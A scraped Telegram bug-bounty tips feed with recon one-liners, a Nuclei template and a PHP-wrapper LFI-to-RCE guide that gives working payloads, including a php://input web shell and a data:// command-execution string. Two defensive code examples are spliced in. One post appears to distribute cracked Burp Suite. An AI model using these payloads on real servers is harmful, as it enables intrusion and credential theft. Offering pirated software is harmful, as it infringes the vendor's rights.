bugbounty_tech | Unsorted

Telegram channel bugbounty_tech - Bug bounty Tips

2246

🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist Admin: @laazy_hack3r


Bug bounty Tips

Guys, after a long time I created a web app to play a sudoku game

check out the repo and let me know

https://github.com/Addy-shetty/Suduko_to_play


Bug bounty Tips

HTB- ALL modules

Run:

python -m http.server 8000


to view clear html pages in localhost:8000


Bug bounty Tips

https://www.bugbountyhunting.com/


Bug bounty Tips

https://github.com/sanjai-AK47/ShodanX


Bug bounty Tips

🚀 Exciting News for #InfoSec & #BugBounty! 🛡

ProxSec v1.0.0 is out—an open-source extension for security pros! 🔥

✅ Proxy management
✅ Scope validation
✅ Program tracking
✅ Lightweight & private

Open-Source : https://github.com/aacle/ProxSec

Feedback welcome! 💬


Bug bounty Tips

https://pocorexp.nsa.im
lists all CVEs and public exploits


Bug bounty Tips

A simple dork that finds every VDP worldwide 😎

(body="/responsible-disclosure" || body="/.well-known/security.txt") && port="443"

credit: http://x.com/darkshadow2bd


Bug bounty Tips

▶️Fresh BB Target - https://lormadetails.com/.well-known/security.txt


Bug bounty Tips

🔖Sorting subdomains into different files based on status code, server type, and vhosts.

cat domains.txt | httpx -server -vhost -sc > httpx-output.txt


Now, use the following awk script to categorize the results:
awk '{gsub(/\x1b\[[0-9;]*m/, ""); status=$2; gsub(/[\[\]]/, "", status); server=$3; gsub(/[\[\]]/, "", server); safe_server=server; gsub(/[^a-zA-Z0-9_-]/, "_", safe_server); main_server=server; sub(/\/.*/, "", main_server); gsub(/[^a-zA-Z0-9_-]/, "_", main_server); vhost=$4; gsub(/[\[\]]/, "", vhost); if (server=="") print > "server-not-specified.txt"; else {print > (safe_server ".txt"); print > (main_server ".txt");} if (vhost=="vhost") print > "vhost.txt";}' httpx-output.txt

#InfoSec #CyberSecurity #Hacking #httpx #bugbounty #bugbountytips #bugbountyTools

🔹 Share & Support Us 🔹


Bug bounty Tips

🔐 Breaking APIs: An Offensive API Pentesting Course

🎓 Course Content:

1. 🚀 Introduction
2. 📚 What is API Pentesting?
3. 🧪 Lab Setup
4. 🛠 Tools Setup
5. 🔍 Active and Passive Recon
6. 🔑 API Endpoint Analysis
7. ⚔️ BOLA
8. 🔓 Broken Authentication
9. 🛡 BFLA
10. 🕵️ SSRF
11. 📊 Excessive Data Exposure
12. 📈 Lack of Resource and Rate Limiting
13. 📦 Mass Assignment
14. 💉 Injection Attacks
15. 🏗 Improper Asset Management
16. 🔧 Security Misconfigurations
17. 📝 Insufficient Logging and Monitoring
18. 🎁 Bonus Lecture

✅ Why Enroll?

- ⏰ 5+ hours of in-depth content, including labs.
- 🔬 Hands-on exercises to reinforce key concepts and techniques.
- 📝 Quizzes and tasks to ensure you master API pentesting skills.

🔗 Link :- https://www.udemy.com/course/breaking-apis-an-offensive-api-pentesting-course/?referralCode=F7408590E13C6D21428B

💵 30-day money-back guarantee!

🧑‍🎓Keep Learning and Exploring


Bug bounty Tips

https://gowsundar.gitbook.io/book-of-bugbounty-tips


Bug bounty Tips

Burp Suite Professional v2024.5 + BurpBounty_Pro 2.8.0 + JDK 22

pass: 311138

README (en+ru) inside, plz read it before run BS.

Happy Hacking! 🥳

Run with Java SE JDK 22


Bug bounty Tips

A simple Python script to scan multiple targets for SQL Injection via HTTP headers like User-Agent, X-Forwarded-For, and X-Client-IP.

https://github.com/ifconfig-me/SQLi-Scanner


Bug bounty Tips

👻New BB Target - https://www.brilliantdirectories.com/security-bounty


Bug bounty Tips

Anyone looking for an internship in the USA, try this..


Bug bounty Tips

https://beerus11.medium.com/redis-internals-and-use-cases-the-definitive-guide-4bab3b7faf11


Bug bounty Tips

This is my suggestion for whoever needs to start in cybersecurity: a 6-month plan


Bug bounty Tips

https://github.com/kh4sh3i/Application-Security-Interview-Questions


Bug bounty Tips

Spotlight on taiphung217: Five-Month Climb to Huntr Leaderboard Glory

https://blog.huntr.com/spotlight-taiphung217-five-month-huntr-leaderboard-climb


Bug bounty Tips

Guys, this is a regularly updated blog by cipherops. If you need anything, you can go and check here. If possible, I would like to update it twice a week.

https://cipherops.gitbook.io/bug-bounty-notes


Bug bounty Tips

🔥 Mastering PHP Filters & Wrappers for LFI to RCE — FULL GUIDE

⚠️Most hackers stop at reading logs.
The elite use PHP wrappers to turn LFI into remote code execution.
This post is your all-in-one breakdown of how PHP wrappers work and how to exploit them like a pro. 👇

🎯 Why PHP Wrappers Matter in Bug Bounty

PHP provides built-in stream wrappers — special protocols to access I/O sources like files, memory, input/output streams, and even compressed/encrypted data.


As attackers, we can abuse these wrappers to:
✅ Read raw PHP source (even when .php is auto-appended)
✅ Bypass execution to leak secrets
✅ Chain into full RCE
✅ Abuse legacy or misconfigured server behavior

Commonly used wrappers:
▶️ php://filter
▶️ php://input
▶️ php://memory
▶️ data://
▶️ expect://
▶️ zip://
▶️ phar://

🧬 Using php://filter for Source Code Disclosure
This is the most useful wrapper for LFI.

Payload:
php://filter/read=convert.base64-encode/resource=index


Why it works:
✅ read=convert.base64-encode prevents execution of the PHP code
✅ Base64 output = raw, readable source

Example:
http://<IP>/index.php?file=php://filter/read=convert.base64-encode/resource=config

Decode result:
echo 'PD9waHAK...base64...' | base64 -d

Now you see source code, credentials, internal logic, API keys, etc.

🔧 Other Useful PHP Wrappers

1️⃣ php://input

Reads raw POST data.
Good for injecting code during file inclusions via POST.
<?php include('php://input'); ?>

Then POST:
POST /index.php
<?php system($_GET['cmd']); ?>

✅ Shell access via cmd parameter.

2️⃣ expect:// (if available)

Allows direct execution of system commands.
include('expect://ls');

⚠️ Rare but deadly if enabled.

3️⃣ data://

Inline file input using base64 or plaintext.

Example:
include('data://text/plain;base64,PD9waHAgc3lzdGVtKCd3aG9hbWknKTs/Pg==');

🟡 Executes: system('whoami')

4️⃣ zip://

✅ Targets ZIP files as file systems.
✅ Abuse via LFI to include malicious entries.

Structure:
zip://path/to/archive.zip#file_inside.txt

Use this with file upload + LFI combo.

5️⃣ phar://

Deserializes metadata → use with Object Injection + LFI.

Upload malicious PHAR:
phar://path/to/phar_file

If unserialize() is called on a phar wrapper, it can lead to RCE.


🔍 Fuzzing PHP Files Before Exploiting
ffuf -w /opt/seclists/.../directory-list.txt -u http://<IP>/FUZZ.php


Watch for:

200 → exists and renders
403/302 → access denied, but still includable via LFI


📁 Standard Inclusion vs. Filtered Inclusion

Including via:
?file=config

🟡 Executes file, no output if file has no HTML.

Using filter:
?file=php://filter/read=convert.base64-encode/resource=config

🟡 Returns base64 source code.


🧪 Decode & Analyze the Source Code
echo 'base64-encoded-content' | base64 -d


Look for:
✅ $db_password, $admin_pass
✅ API endpoints
✅ Sensitive routes
✅ Hardcoded JWT secrets or keys


💣 Advanced Chaining → From LFI to RCE

Read source via php://filter
Find upload paths or SSRF endpoints
Upload malicious phar:// file
Trigger inclusion → RCE

This chain has been used in real-world bounty reports.

🧱 Defense Tips for Developers:
- Disable allow_url_include, allow_url_fopen
- Avoid dynamic include($_GET['page'])
- Use strict whitelists
- Harden php.ini configs
- Monitor suspicious access patterns


🧠 Daily hacking insights
🛠 Payloads & Tools
🐞 Real bug bounty techniques
⚔️ Hands-on exploitation walkthroughs

👍 Like this post if it helped
🔁 Share to boost your hacker circle

🔗 Github link : github.com/cybersecplayground...

#lfi #phpwrappers #bugbounty #phpfilters #rce #infosec #cybersecurity #webpentest #cybersecplayground
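
The defense tip "Monitor suspicious access patterns" from the post above, as an added example that is not part of the original post: a detector that flags the listed wrapper schemes in query parameters of access-log lines, including percent-encoded and double-encoded forms. The combined log format, the field names and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Wrapper schemes named in the post above.
WRAPPER_RE = re.compile(r"\b(php|data|expect|zip|phar)://", re.IGNORECASE)
# Assumed combined log format: ip - - [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded values are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_wrapper_params(log_line):
    """Return one finding per query parameter that carries a wrapper scheme."""
    m = LOG_RE.match(log_line)
    if not m:
        return []  # unparseable line: nothing to report
    ip, _method, target, status = m.groups()
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        found = WRAPPER_RE.search(fully_decode(value))
        if found:
            hits.append({"ip": ip, "status": int(status), "param": name,
                         "wrapper": found.group(1).lower() + "://"})
    return hits

def scan(lines):
    return [hit for line in lines for hit in find_wrapper_params(line)]

# Constructed sample lines (documentation IP ranges, made-up paths).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2025:10:00:00 +0000] "GET /index.php?file=about HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2025:10:00:05 +0000] "GET /index.php?file=php://filter/read=convert.base64-encode/resource=config HTTP/1.1" 200 2048',
    '198.51.100.7 - - [01/Jan/2025:10:00:09 +0000] "GET /index.php?file=PHAR%253A%252F%252Fuploads%252Fa.jpg HTTP/1.1" 500 0',
    '192.0.2.10 - - [01/Jan/2025:10:00:12 +0000] "GET /search?q=what+is+php HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Access logs normally record only the request line, so values sent in a POST body are outside what this check sees; those need inspection at the application or a WAF.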


Bug bounty Tips

https://soltanali0.medium.com/bypassing-origin-checks-using-trailing-dot-trick-a65007041d3a

http://GitBook_s.t.me


Bug bounty Tips

Nuclei template to find outdated software:

id: outdated-software-detection

info:
  name: Outdated Software Detection
  author: pentester_x
  severity: low
  description: |
    Detects outdated software versions by extracting version information from headers, scripts, and stylesheets.
  reference:
    - https://nvd.nist.gov/vuln/search
    - https://www.cvedetails.com
    - https://www.exploit-db.com
    - https://cve.mitre.org
  tags: outdated,software,vulnerable,version,cve

requests:
  - method: GET
    path:
      - "{{BaseURL}}"
      - "{{BaseURL}}/version"
      - "{{BaseURL}}/status"
      - "{{BaseURL}}/server-info"
      - "{{BaseURL}}/api/version"
      - "{{BaseURL}}/v1/info"
      - "{{BaseURL}}/robots.txt"
    matchers:
      - type: regex
        part: header
        regex:
          - '(?i)(Server|X-Powered-By|Version):.*?(Apache|nginx|PHP|WordPress|Tomcat|MySQL)/(\d+\.\d+\.\d+)'
          - '(?i)(\b\d+\.\d+\.\d+\b)'
    extractors:
      - type: regex
        name: software_version
        group: 3
        part: header
        regex:
          - '(?i)(Server|X-Powered-By|Version):.*?(Apache|nginx|PHP|WordPress|Tomcat|MySQL)/(\d+\.\d+\.\d+)'
      - type: regex
        name: software_version
        regex:
          - '(?i)v?(?:ersion)?[\s:]*(\d+\.\d+\.\d+)'

  - method: GET
    path:
      - "{{BaseURL}}/static/main.js"
      - "{{BaseURL}}/css/styles.css"
      - "{{BaseURL}}/app/build.js"
      - "{{BaseURL}}/assets/scripts.js"
    matchers:
      - type: regex
        regex:
          - '(?i)v?\d+\.\d+\.\d+'
          - '@version\s+\d+\.\d+\.\d+'
    extractors:
      - type: regex
        name: software_version
        regex:
          - '(?i)v?(\d+\.\d+\.\d+)'
          - '@version\s+(\d+\.\d+\.\d+)'



#infosec #cybersecurity #bugbounty #pentest #bugbountyTips #JS #Nuclei


Bug bounty Tips

One of the best blogs to use for bug bounty and to make it better with AI

if you guys liked it give me a reaction

https://blog.ethiack.com/blog/supercharging-bug-bounty-hunting-with-ai


Bug bounty Tips

https://github.com/TrshPuppy/PNPT-study-guide


Bug bounty Tips

🐲 Kali Linux Cheat Sheet.

➡Recon and Enumeration;
➡Python Local Web Server;
➡Mounting File Shares;
➡Basic FingerPrinting;
➡SNMP Enumeration;
➡DNS Zone Transfers;
➡DNSRecon;
➡HTTP / HTTPS Webserver Enumeration;
➡Packet Inspection;
➡Username Enumeration;
➡Passwords;
➡Brute Forcing Services;
➡Password Cracking;
➡Exploit Research;
➡Compiling Exploits;
➡SUID Binary;
➡TTY Shells;
➡Metasploit;
➡Networking;
➡IPv4;
➡ASCII Table Cheat Sheet;
➡Cisco IOS Commands.

➡️ https://github.com/NoorQureshi/kali-linux-cheatsheet


Linux Network Commands Cheat Sheet;
RedHat Linux Commands Cheat Sheet;
Linux Ubuntu Commands Cheat Sheet;
Oracle Linux Cheat Sheet;
Centos Cheat Sheet;
Arch Linux Cheat Sheet;
Basic Linux Commands Cheat Sheet;
Advanced Linux Commands Cheat Sheet;
Linux Commands Cheat Sheet for DevOps;
Kali Linux Commands Cheat Sheet;
Linux Network Commands Cheat Sheet;
Linux to Windows Commands Cheat Sheet.

●▬۩❁ @geeekgirl ❁۩▬●


Bug bounty Tips

🌀Download all bug bounty programs domains in scope items 🎯

😉Get a full list of domains from active bug bounty programs across platforms like HackerOne, Bugcrowd, Intigriti, and more – all in one place!💥

👇🏼Step 1: Download the domains.txt file

📂Step 2: Extract only main/root domains

`cat domains.txt | awk -F '.' '{print $(NF-1)"."$NF}' | grep -Eo '([a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}' | sort -u > main_domains`

📂Step 3: Extract all IP addresses:

`grep -Eo '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b' domains.txt > ips.txt`

Don't forget to give reactions❤️
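
Steps 2 and 3 above, as an added example that is not part of the original post: the one-liners keep only the last two labels (so `shop.example.co.uk` collapses to `co.uk`) and the IP pattern accepts octets above 255, which can put the wrong assets in a scope list. This version validates addresses with `ipaddress` and handles multi-label suffixes; the suffix set and the sample entries are constructed assumptions standing in for the real Public Suffix List and `domains.txt`.

```python
import ipaddress
import re

# Constructed, deliberately tiny stand-in for the Public Suffix List (assumption).
MULTI_LABEL_SUFFIXES = {"co.uk", "com.au", "co.in", "com.br"}
# Hostname with an optional leading wildcard, as scope lists often write it.
HOST_RE = re.compile(r"^(?:\*\.)?((?:[a-z0-9-]+\.)+[a-z]{2,})$")

def classify(entry):
    """Return ("ip", addr), ("domain", root) or (None, None) for one scope line."""
    entry = entry.strip().lower()
    try:
        return "ip", str(ipaddress.ip_address(entry))  # rejects 999.10.10.10
    except ValueError:
        pass
    m = HOST_RE.match(entry)
    if not m:
        return None, None
    labels = m.group(1).split(".")
    suffix_len = 2 if ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES else 1
    if len(labels) <= suffix_len:
        return None, None  # a bare suffix is not a registrable domain
    return "domain", ".".join(labels[-(suffix_len + 1):])

def split_scope(lines):
    """Split scope entries into sorted unique root domains and IP addresses."""
    roots, ips = set(), set()
    for line in lines:
        kind, value = classify(line)
        if kind == "ip":
            ips.add(value)
        elif kind == "domain":
            roots.add(value)
    return sorted(roots), sorted(ips)

# Constructed sample entries in place of the downloaded domains.txt.
SAMPLE_SCOPE = ["api.example.com", "*.shop.example.co.uk", "203.0.113.5",
                "999.10.10.10", "Example.com", "co.uk"]

if __name__ == "__main__":
    print(split_scope(SAMPLE_SCOPE))
```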


Bug bounty Tips

Challenge: Identify 2 security risks and improve error handling.


Bug bounty Tips

Comolho.com is a great bug bounty platform, only if you want to hack on Indian websites.
- Low bounty
- Slow response
- Bad UI

- Indian programs
- Good for beginners

Here you can hunt for learning not for big bounties.


Bug bounty Tips

https://x.com/CtPrecious/status/1900288792356913315?s=35
